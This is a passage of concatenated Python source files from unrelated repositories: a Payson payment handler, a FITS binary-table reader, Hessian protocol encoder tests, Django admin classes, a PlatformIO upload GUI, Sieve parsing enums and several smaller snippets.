pytransact.context import ReadonlyContext, maybe_with_context from pytransact.commit import CommitContext, CallToi, CreateToi, wait_for_commit import blm.accounting, blm.members log = config.getLogger('payson') class PaysonError(RuntimeError): pass def pay(database, providerId, purchaseId, returnto): with ReadonlyContext(database) as ctx: provider, = blm.accounting.PaysonProvider._query(id=providerId).run() org = provider.org[0] purchase, = blm.members.BasePurchase._query(id=purchaseId).run() api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) receiver = payson.Receiver(email=provider.receiverEmail[0], amount=purchase.remainingAmount[0]) memo = (u'Betalning till %s' % org.name[0])[:128] ipnBase = (config.config.get('payson', 'ipn_notification_baseurl') or config.config.get('accounting', 'baseurl')) ipnNotificationUrl = urljoin(ipnBase, 'paysonipn') payment_response = api.pay( returnUrl=returnto, cancelUrl=returnto, ipnNotificationUrl=ipnNotificationUrl, memo=memo, senderEmail=purchase.buyerEmail[0], senderFirstName=purchase.buyerName[0].split()[0], senderLastName=purchase.buyerName[0].split()[-1], trackingId=str(purchaseId), custom=str(providerId), receiverList=[receiver] ) if payment_response.success: return flask.redirect(payment_response.forward_pay_url) return '' def payson_ipn(request, database): log.info('IPN request') payData = payson.PaymentDetails(request.values) with ReadonlyContext(database): provider, = blm.accounting.PaysonProvider._query(id=payData.custom).run() api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) requestdata = urlencode(request.form) log.info('Request data: %r', requestdata) if api.validate(requestdata): log.info('IPN Verified') update_payment(payData.token, database, provider=provider) else: log.info('IPN NOT Verified') return '', httplib.NO_CONTENT def update_payment(token, database, purchase=None, 
provider=None): log.info('Payson update') with ReadonlyContext(database): if blm.members.PaysonPayment._query(token=token).run(): log.info('Payment %s already registered, aborting.', token) return if not provider: purchase, = blm.members.Purchase._query(id=purchase, _attrList=['org']).run() provider = blm.accounting.PaysonProvider._query(org=purchase.org).run()[0] api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) payData = api.payment_details(token) if payData.status == 'COMPLETED': with CommitContext(database) as ctx: purchase, = blm.members.Purchase._query(id=payData.trackingId).run() op = CreateToi('members.PaysonPayment', None, dict( paymentProvider=[provider], matchedPurchase=[purchase], amount=[payData.receiverList[0].amount], purchaseId=[payData.purchaseId], senderEmail=[payData.senderEmail], token=[payData.token], receiverFee=[payData.receiverFee], receiverEmail=[payData.receiverList[0].email], type=[payData.type])) interested = 'payson-%s' % ObjectId() commit = ctx.runCommit([op], interested=interested) result, error = wait_for_commit(database, interested=interested) if error: raise error paymentId = result[0] with CommitContext(database) as ctx: op = CallToi(paymentId, 'sendConfirmationEmail', []) interested = 'send-payson-payment-confirmation-%s' % ObjectId() commit = ctx.runCommit([op], interested=interested) result, error = wait_for_commit(database, interested=interested) if error: raise error @maybe_with_context() def refund(payment): provider = payment.paymentProvider[0] api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) if not api.payment_update(payment.token[0], 'REFUND'): raise PaysonError() return True <reponame>wangleon/stella import struct import numpy as np from .memoize import memoized def tform_to_format(tform): """Convert `TFORM` string in FITS binary table to format string in Python `struct` module. Args: tfrom (str): `TFORM` string in FITS binary table. Returns: str: A format string used in Python `struct` module. """ if tform == 'L': return 'b' # 1 byte, boolean if tform == 'B': return 'B' # 1 byte, unsigned byte if tform == 'I': return 'h' # 2 bytes, integer if tform == 'J': return 'i' # 4 bytes, integer if tform == 'K': return 'l' # 8 bytes, integer if tform == 'E': return 'f' # 4 bytes, single-precision float if tform == 'D': return 'd' # 8 bytes, double-precision float if tform == 'C': return '?' # 8 bytes, single-precision complex if tform == 'M': return '?' # 16 bytes, double-precision complex if tform == 'P': return '?' # 8 bytes, 32 bits array descriptor if tform == 'Q': return '?' # 16 bytes, 64 bits array descriptor if tform[-1] == 'A': return tform[0:-1]+'s' # 1 bytes, character def tform_to_dtype(tform): """Convert `TFORM` string in FITS binary table to Numpy dtype. Args: tfrom (str): `TFORM` string in FITS binary table. Returns: :class:`numpy.dtype`: Numpy dtype object. """ if tform == 'L': return np.bool # 1 byte, boolean #if tform == 'B': return 'B' # 1 byte, unsigned byte if tform == 'I': return np.int16 # 2 bytes, integer if tform == 'J': return np.int32 # 4 bytes, integer if tform == 'K': return np.int64 # 8 bytes, integer if tform == 'E': return np.float32 # 4 bytes, single-precision float if tform == 'D': return np.float64 # 8 bytes, double-precision float if tform == 'C': return '?' # 8 bytes, single-precision complex if tform == 'M': return '?' # 16 bytes, double-precision complex if tform == 'P': return '?' # 8 bytes, 32 bits array descriptor if tform == 'Q': return '?' 
# 16 bytes, 64 bits array descriptor if tform[-1] == 'A': return 'S'+tform[0:-1] # 1 bytes, character @memoized def get_bintable_info(filename, extension=1): """Return the information of the binary table in a given FITS file. Args: filename (str): Name of the input FITS file. extension (int): Extension of the binary table to be read. Returns: tuple: A tuple containing: * **naxis1** (*int*): Length of row in bytes. * **naxis2** (*int*): Number of rows in the table. * **tfields** (*int*): Number of columns in the table. * **position** (*int*): The starting position of the table. * **dtype** (:class:`numpy.dtype`): Numpy dtype of the row. * **fmtfunc** (*function*): Function to format the rows. Examples: .. code-block:: python from stella.utils.fitsio import get_bintable_info nbyte, nrow, ncol, pos, dtype, fmtfunc = get_bintable_info(filename) """ infile = open(filename,'rb') current_hdu = 0 while(True): block = infile.read(36*80) if block[0:8].decode('ascii') == 'XTENSION': current_hdu += 1 if block[10:30].decode('ascii').strip()[1:-1]=='BINTABLE' and \ current_hdu==extension: infile.seek(-36*80,1) #current_position = infile.tell() #infile.seek(current_position-36*80) break count = 0 # read the header of binary table while(True): row = infile.read(80).decode('ascii') count += 1 if row[0:3]=='END': infile.seek((36-count%36)*80,1) break elif row[0:6]=='NAXIS1': naxis1 = int(row[10:30]) elif row[0:6]=='NAXIS2': naxis2 = int(row[10:30]) elif row[0:7]=='TFIELDS': tfields = int(row[10:30]) ttype_lst = ['' for j in range(tfields)] tform_lst = ['' for j in range(tfields)] elif row[0:5]=='TTYPE': index = int(row[5:8]) ttype_lst[index-1] = row[10:30].strip()[1:-1].strip() elif row[0:5]=='TFORM': index = int(row[5:8]) tform_lst[index-1] = row[10:30].strip()[1:-1].strip() else: pass position = infile.tell() infile.close() formats = tuple([tform_to_dtype(v) for v in tform_lst]) record = np.dtype({'names':ttype_lst,'formats':formats}) fmt = '>'+(''.join([tform_to_format(v) for v in tform_lst])) fmtfunc = lambda string: np.array(struct.unpack(fmt, string),dtype=record) return naxis1, naxis2, tfields, position, record, fmtfunc <reponame>chance-nelson/python-hessian import datetime import six from pyhessian import protocol from pyhessian.data_types import long from .base import HessianTestCase # Caucho's Hessian 2.0 reference service # interface: http://caucho.com/resin-javadoc/com/caucho/hessian/test/TestHessian2.html class EncoderTestCase(HessianTestCase): def test_encode_binary_0(self): arg = protocol.Binary(b"") response = self.client.argBinary_0(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_1(self): arg = protocol.Binary(b"0") response = self.client.argBinary_1(arg) self.assertEqual(response, True, "Debug response: %s" % response) def get_arg_str_1024(self): arg_str = "" for i in range(0, 16): arg_str += "%d%d%s" % ( i // 10, i % 10, " 456789012345678901234567890123456789012345678901234567890123\n") return arg_str[:1024] def get_arg_str_65536(self): arg_str = "" for i in range(0, 64 * 16): arg_str += "%d%d%d%s" % ( i // 100, (i // 10) % 10, i % 10, " 56789012345678901234567890123456789012345678901234567890123\n") return arg_str[:65536] def test_encode_binary_1023(self): arg = protocol.Binary(six.b(self.get_arg_str_1024()[:1023])) response = self.client.argBinary_1023(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_1024(self): arg = protocol.Binary(six.b(self.get_arg_str_1024()[:1024])) response = 
self.client.argBinary_1024(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_15(self): response = self.client.argBinary_15(protocol.Binary(b"012345678901234")) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_16(self): response = self.client.argBinary_16(protocol.Binary(b"0123456789012345")) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_65536(self): arg = protocol.Binary(six.b(self.get_arg_str_65536())) response = self.client.argBinary_65536(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_date_0(self): arg = datetime.datetime.utcfromtimestamp(0) response = self.client.argDate_0(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_date_1(self): response = self.client.argDate_1(datetime.datetime(1998, 5, 8, 9, 51, 31)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_date_2(self): response = self.client.argDate_2(datetime.datetime(1998, 5, 8, 9, 51, 0)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_0_0(self): response = self.client.argDouble_0_0(0.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_0_001(self): response = self.client.argDouble_0_001(0.001) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_1_0(self): response = self.client.argDouble_1_0(1.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_127_0(self): response = self.client.argDouble_127_0(127.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_128_0(self): response = self.client.argDouble_128_0(128.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_2_0(self): response = self.client.argDouble_2_0(2.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_3_14159(self): response = self.client.argDouble_3_14159(3.14159) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_32767_0(self): response = self.client.argDouble_32767_0(32767.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_65_536(self): response = self.client.argDouble_65_536(65.536) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m0_001(self): response = self.client.argDouble_m0_001(-0.001) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m128_0(self): response = self.client.argDouble_m128_0(-128.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m129_0(self): response = self.client.argDouble_m129_0(-129.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m32768_0(self): response = self.client.argDouble_m32768_0(-32768.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_false(self): result = self.client.argFalse(False) self.assertEqual(True, result, result) def test_encode_int_0(self): response = self.client.argInt_0(0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x30(self): response = self.client.argInt_0x30(0x30) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x3ffff(self): response = 
self.client.argInt_0x3ffff(0x3ffff) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x40000(self): response = self.client.argInt_0x40000(0x40000) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x7ff(self): response = self.client.argInt_0x7ff(0x7ff) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x7fffffff(self): response = self.client.argInt_0x7fffffff(0x7fffffff) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x800(self): response = self.client.argInt_0x800(0x800) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_1(self): response = self.client.argInt_1(1) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_47(self): response = self.client.argInt_47(47) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x40000(self): response = self.client.argInt_m0x40000(-0x40000) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x40001(self): response = self.client.argInt_m0x40001(-0x40001) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x800(self): response = self.client.argInt_m0x800(-0x800) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x80000000(self): response = self.client.argInt_m0x80000000(-0x80000000) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x801(self): response = self.client.argInt_m0x801(-0x801) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m16(self): response = self.client.argInt_m16(-16) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m17(self): response = self.client.argInt_m17(-17) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0(self): response = self.client.argLong_0(long(0)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x10(self): response = self.client.argLong_0x10(long(0x10)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x3ffff(self): response = self.client.argLong_0x3ffff(long(0x3ffff)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x40000(self): response = self.client.argLong_0x40000(long(0x40000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x7ff(self): response = self.client.argLong_0x7ff(long(0x7ff)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x7fffffff(self): response = self.client.argLong_0x7fffffff(long(0x7fffffff)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x800(self): response = self.client.argLong_0x800(long(0x800)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x80000000(self): response = self.client.argLong_0x80000000(long(0x80000000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_1(self): response = self.client.argLong_1(long(1)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_15(self): response = self.client.argLong_15(long(15)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x40000(self): response = 
self.client.argLong_m0x40000(long(-0x40000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x40001(self): response = self.client.argLong_m0x40001(long(-0x40001)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x800(self): response = self.client.argLong_m0x800(long(-0x800)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x80000000(self): response = self.client.argLong_m0x80000000(long(-0x80000000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x80000001(self): response = self.client.argLong_m0x80000001(long(-0x80000001)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x801(self): response = self.client.argLong_m0x801(long(-0x801)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m8(self): response = self.client.argLong_m8(long(-8)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m9(self): response = self.client.argLong_m9(long(-9)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_null(self): response = self.client.argNull(None) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_0(self): payload = protocol.object_factory('com.caucho.hessian.test.A0') response = self.client.argObject_0(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_1(self): payload = protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0) response = self.client.argObject_1(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_16(self): payload = [ protocol.object_factory('com.caucho.hessian.test.A0'), protocol.object_factory('com.caucho.hessian.test.A1'), protocol.object_factory('com.caucho.hessian.test.A2'), protocol.object_factory('com.caucho.hessian.test.A3'), protocol.object_factory('com.caucho.hessian.test.A4'), protocol.object_factory('com.caucho.hessian.test.A5'), protocol.object_factory('com.caucho.hessian.test.A6'), protocol.object_factory('com.caucho.hessian.test.A7'), protocol.object_factory('com.caucho.hessian.test.A8'), protocol.object_factory('com.caucho.hessian.test.A9'), protocol.object_factory('com.caucho.hessian.test.A10'), protocol.object_factory('com.caucho.hessian.test.A11'), protocol.object_factory('com.caucho.hessian.test.A12'), protocol.object_factory('com.caucho.hessian.test.A13'), protocol.object_factory('com.caucho.hessian.test.A14'), protocol.object_factory('com.caucho.hessian.test.A15'), protocol.object_factory('com.caucho.hessian.test.A16'), ] response = self.client.argObject_16(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_2(self): payload = [ protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0), protocol.object_factory('com.caucho.hessian.test.TestObject', _value=1), ] response = self.client.argObject_2(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_2a(self): payload = protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0) response = self.client.argObject_2a([payload, payload]) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_2b(self): payload = [ protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0), 
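            # note: argObject_2a above sends the *same* TestObject instance
            # twice, while argObject_2b sends two separately constructed,
            # equal instances, presumably distinguishing Hessian's object
            # back-reference handling from plain value duplication.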
protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0), ] response = self.client.argObject_2b(payload) self.assertEqual(response, True, "Debug response: %s" % response) ### argObject_3 causes a stack pop. BOOM, recursion. def test_encode_object_3(self): payload = protocol.object_factory('com.caucho.hessian.test.TestCons', _first='a', _rest=None) payload._rest = payload response = self.client.argObject_3(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_0(self): response = self.client.argString_0("") self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_1(self): response = self.client.argString_1("0") self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_31(self): payload = "0123456789012345678901234567890" response = self.client.argString_31(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_32(self): payload = "01234567890123456789012345678901" response = self.client.argString_32(payload) self.assertEqual(response, True, "Debug response: %s" % response) ### here, we have to generate big convoluted strings. later. def test_encode_string_1023(self): arg = self.get_arg_str_1024()[:1023] response = self.client.argString_1023(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_1024(self): response = self.client.argString_1024(self.get_arg_str_1024()) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_65536(self): response = self.client.argString_65536(self.get_arg_str_65536()) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_true(self): response = self.client.argTrue(True) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_string_emoji(self): response = self.client.argString_emoji(u"\U0001F603") self.assertTrue(response, "Debug response: %s" % response) <reponame>BeacherHou/Python-_Markdown-<gh_stars>0 """ FAILS-- can't grid and pack in same parent container (here, root window) """ from tkinter import * from grid2 import gridbox, packbox root = Tk() gridbox(root) packbox(root) Button(root, text='Quit', command=root.quit).pack() mainloop() #!/usr/bin/env python3 from openapi_server.cached import CachedSpecification from connexion.spec import Specification Specification.__init__ = CachedSpecification.__init__; Specification.from_file = CachedSpecification.from_file import connexion from openapi_server import encoder def main(): app = connexion.App(__name__, specification_dir='./openapi/') app.app.json_encoder = encoder.JSONEncoder app.add_api('openapi.yaml', arguments={'title': 'Model Catalog'}, pythonic_params=False) app.run(port=8080) if __name__ == '__main__': main() <filename>transactions/admin.py<gh_stars>1-10 from django.contrib import admin from transactions.models import DebitNote, DebitNoteItem, Event, EventStatus, Request, ServiceOrder class DebitNoteItemInline(admin.TabularInline): model = DebitNoteItem extra = 0 raw_id_fields = ('debit_note',) @admin.register(Event) class EventAdmin(admin.ModelAdmin): list_display = ('code', 'machine', 'category', 'subject') list_filter = ('machine', 'category', 'date_added', 'date_changed') readonly_fields = ('company',) @admin.register(EventStatus) class EventStatusAdmin(admin.ModelAdmin): list_display = ('event', 'status', 'date_added') list_filter = ('status', 'date_added', 'date_changed') @admin.register(ServiceOrder) class 
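# A minimal workaround sketch for the failure described above, assuming only that
# grid2.gridbox/packbox accept an arbitrary parent widget (as the calls above suggest):
# Tkinter rejects mixing grid() and pack() among children of the *same* container, so
# giving each helper its own Frame avoids the conflict.
from tkinter import *
from grid2 import gridbox, packbox

root = Tk()
grid_area = Frame(root)                 # children of grid_area use grid()
pack_area = Frame(root)                 # children of pack_area use pack()
grid_area.pack(fill=BOTH, expand=True)  # the frames themselves are packed into root
pack_area.pack(fill=BOTH, expand=True)
gridbox(grid_area)
packbox(pack_area)
Button(root, text='Quit', command=root.quit).pack()
mainloop()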
#!/usr/bin/env python3
from openapi_server.cached import CachedSpecification
from connexion.spec import Specification
Specification.__init__ = CachedSpecification.__init__
Specification.from_file = CachedSpecification.from_file
import connexion
from openapi_server import encoder


def main():
    app = connexion.App(__name__, specification_dir='./openapi/')
    app.app.json_encoder = encoder.JSONEncoder
    app.add_api('openapi.yaml', arguments={'title': 'Model Catalog'}, pythonic_params=False)
    app.run(port=8080)


if __name__ == '__main__':
    main()


<filename>transactions/admin.py<gh_stars>1-10
from django.contrib import admin

from transactions.models import DebitNote, DebitNoteItem, Event, EventStatus, Request, ServiceOrder


class DebitNoteItemInline(admin.TabularInline):
    model = DebitNoteItem
    extra = 0
    raw_id_fields = ('debit_note',)


@admin.register(Event)
class EventAdmin(admin.ModelAdmin):
    list_display = ('code', 'machine', 'category', 'subject')
    list_filter = ('machine', 'category', 'date_added', 'date_changed')
    readonly_fields = ('company',)


@admin.register(EventStatus)
class EventStatusAdmin(admin.ModelAdmin):
    list_display = ('event', 'status', 'date_added')
    list_filter = ('status', 'date_added', 'date_changed')


@admin.register(ServiceOrder)
class ServiceOrderAdmin(admin.ModelAdmin):
    list_display = ('code', 'event', 'category', 'machine', 'priority')
    list_filter = ('category', 'priority')
    search_fields = ('event', 'category', 'subject', 'description')
    readonly_fields = ('company',)


@admin.register(Request)
class RequestAdmin(admin.ModelAdmin):
    list_display = ('code', 'category', 'machine', 'date')
    list_filter = ('category', 'date')
    search_fields = ('subject', 'machine', 'category')


@admin.register(DebitNote)
class DebitNoteAdmin(admin.ModelAdmin):
    list_display = ('code', 'reference', 'service_order', 'company', 'status', 'total')
    list_filter = (
        'status',
        ('company', admin.RelatedOnlyFieldListFilter)
    )
    search_fields = ('reference', 'comments', 'company')
    readonly_fields = ('company', 'total')
    inlines = (DebitNoteItemInline,)


@admin.register(DebitNoteItem)
class DebitNoteItemAdmin(admin.ModelAdmin):
    list_display = ('code', 'debit_note', 'total')
    list_filter = ('date',)
    search_fields = ('description',)
    readonly_fields = ('total',)


<reponame>lucyundead/athena--fork
# Regression test based on the diffusion of a Gaussian
# velocity field. Convergence of L1 norm of the error
# in v is tested. Expected 1st order conv. for STS.

# Modules
# (needed for global variables modified in run_tests.py, even w/o athena.run(), etc.)
import scripts.utils.athena as athena  # noqa
import scripts.tests.diffusion.viscous_diffusion as viscous_diffusion
import logging

viscous_diffusion.method = 'STS'
viscous_diffusion.rate_tols = [-0.99]
viscous_diffusion.logger = logging.getLogger('athena' + __name__[7:])


def prepare(*args, **kwargs):
    return viscous_diffusion.prepare('sts', *args, **kwargs)


def run(**kwargs):
    return viscous_diffusion.run(**kwargs)


def analyze():
    return viscous_diffusion.analyze()


# Create by Packetsss
# Personal use is allowed
# Commercial use is prohibited

i = 1
while i <= 5:
    print(i)
    i += 1.5
print("Done!")


<reponame>Tonio5978/esp-rgb-led-matrix
# MIT License
#
# Copyright (c) 2019 - 2021 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.

import tkinter as tk
from tkinter import ttk
import json

Import("env")


class App(tk.Frame):

    def __init__(self, parent=None):
        super(App, self).__init__(parent)
        self._FILENAME = "upload.json"
        self._parent = parent
        self._ipAddress = tk.StringVar()
        self._port = tk.IntVar()
        self._password = tk.StringVar()
        self._isAborted = True

        self._load(self._FILENAME)

        labelIpAddress = tk.Label(self, text="IP-Address:", anchor="w")
        inputIpAddress = tk.Entry(self, textvariable=self._ipAddress)
        labelPort = tk.Label(self, text="Port:", anchor="w")
        inputPort = tk.Entry(self, textvariable=self._port)
        labelPassword = tk.Label(self, text="Password:", anchor="w")
        inputPassword = tk.Entry(self, textvariable=self._password, show="*")

        labelIpAddress.pack(fill="x", expand=False)
        inputIpAddress.pack(fill="x", expand=True)
        labelPort.pack(fill="x", expand=False)
        inputPort.pack(fill="x", expand=True)
        labelPassword.pack(fill="x", expand=False)
        inputPassword.pack(fill="x", expand=True)

        buttonUpload = tk.Button(self, text="Upload", command=self._upload)
        buttonUpload.pack(fill="x", expand=False)

    def _load(self, fileName):
        try:
            with open(fileName) as jsonFile:
                data = json.load(jsonFile)
                if ("ipAddress" in data):
                    self._ipAddress.set(data["ipAddress"])
                if ("port" in data):
                    self._port.set(data["port"])
                if ("password" in data):
                    self._password.set(data["password"])
        except:
            self._ipAddress.set("192.168.x.x")
            self._port.set(3232)
            self._password.set("<PASSWORD>")
            pass

    def _save(self, fileName):
        data = {}
        data["ipAddress"] = self._ipAddress.get()
        data["port"] = self._port.get()
        data["password"] = self._password.get()
        json.dumps(data)
        try:
            with open(fileName, "w") as jsonFile:
                json.dump(data, jsonFile, indent=4)
        except:
            pass

    def _upload(self):
        self._save(self._FILENAME)
        self._isAborted = False
        self._parent.quit()

    def isAborted(self):
        return self._isAborted

    def getIPAddress(self):
        return self._ipAddress.get()

    def getPort(self):
        return self._port.get()

    def getPassword(self):
        return self._password.get()


def beforeUpload(source, target, env):
    root = tk.Tk()
    main = App(root)
    root.title("Upload Utility")
    main.pack(fill="x", expand=True)
    root.update()
    root.minsize(root.winfo_width() * 2, root.winfo_height())
    root.protocol("WM_DELETE_WINDOW", lambda: root.quit())
    root.mainloop()
    root.destroy()

    if (False == main.isAborted()):
        env.Replace(
            UPLOAD_PORT=main.getIPAddress(),
            UPLOAD_FLAGS=["--port=" + str(main.getPort()), "--auth=" + main.getPassword()]
        )
    else:
        print("Aborted. Using upload parameters from platform.ini")


env.AddPreAction("upload", beforeUpload)
env.AddPreAction("uploadfs", beforeUpload)


from __future__ import annotations

import enum
from collections.abc import Sequence
from typing import Union, Optional

__all__ = ['AddressPart', 'MatchType', 'SizeComparator', 'str_list', 'unquote']


class AddressPart(enum.Enum):
    LOCALPART = enum.auto()
    DOMAIN = enum.auto()
    ALL = enum.auto()

    @classmethod
    def of(cls, flag: Optional[str]) -> AddressPart:
        if not flag:
            return cls.ALL
        elif flag == ':localpart':
            return cls.LOCALPART
        elif flag == ':domain':
            return cls.DOMAIN
        elif flag == ':all':
            return cls.ALL
        else:
            raise NotImplementedError(flag)


class MatchType(enum.Enum):
    IS = enum.auto()
    CONTAINS = enum.auto()
    MATCHES = enum.auto()

    @classmethod
    def of(cls, flag: Optional[str]) -> MatchType:
        if not flag:
            return cls.IS
        elif flag == ':is':
            return cls.IS
        elif flag == ':contains':
            return cls.CONTAINS
        elif flag == ':matches':
            return cls.MATCHES
        else:
            raise NotImplementedError(flag)


class SizeComparator(enum.Enum):
    OVER = enum.auto()
    UNDER = enum.auto()

    @classmethod
    def of(cls, flag: str) -> SizeComparator:
        if flag == ':over':
            return cls.OVER
        elif flag == ':under':
            return cls.UNDER
        else:
            raise NotImplementedError(flag)


def str_list(value: Union[str, Sequence[str]]) -> Sequence[str]:
    if isinstance(value, str):
        return [unquote(value)]
    else:
        return [unquote(val) for val in value]


def unquote(value: str) -> str:
    if value[0] == '"' and value[-1] == '"':
        return value[1:-1]
    else:
        return value


<gh_stars>0
"""
Hangman.

Authors: <NAME> and <NAME>.
"""
# DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.
# DONE: 2. Implement Hangman using your Iterative Enhancement Plan.
import random

####### Do NOT attempt this assignment before class! #######

## This was done in a group with <NAME>, <NAME> and I. <NAME> pushed our fully implemented Hangman code.
## Dr. Mutchler told me this was acceptable to turn in considering we did it as a group on Sam's computer.


<reponame>toandaominh1997/automlkiller
from sklearn.linear_model import RidgeClassifier

from automlkiller.models.model_factory import ModelFactory
from automlkiller.utils.distributions import np_list_arange, UniformDistribution


@ModelFactory.register('classification-ridgeclassifier')
class RidgeClassifierContainer(RidgeClassifier):
    def __init__(self, **kwargs):
        # super(RidgeClassifierContainer, self).__init__()
        super().__init__()
        tune_grid = {}
        tune_distributions = {}

        tune_grid = {
            "normalize": [True, False],
        }
        tune_grid["alpha"] = np_list_arange(0.01, 10, 0.01, inclusive=False)
        tune_grid["fit_intercept"] = [True, False]
        tune_distributions["alpha"] = UniformDistribution(0.001, 10)
        self.tune_grid = tune_grid
        self.tune_distributions = tune_distributions
        self.estimator = RidgeClassification(**kwargs)


class RidgeClassification(RidgeClassifier):
    def predict_proba(self, X):
        return self.predict(X)


# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.
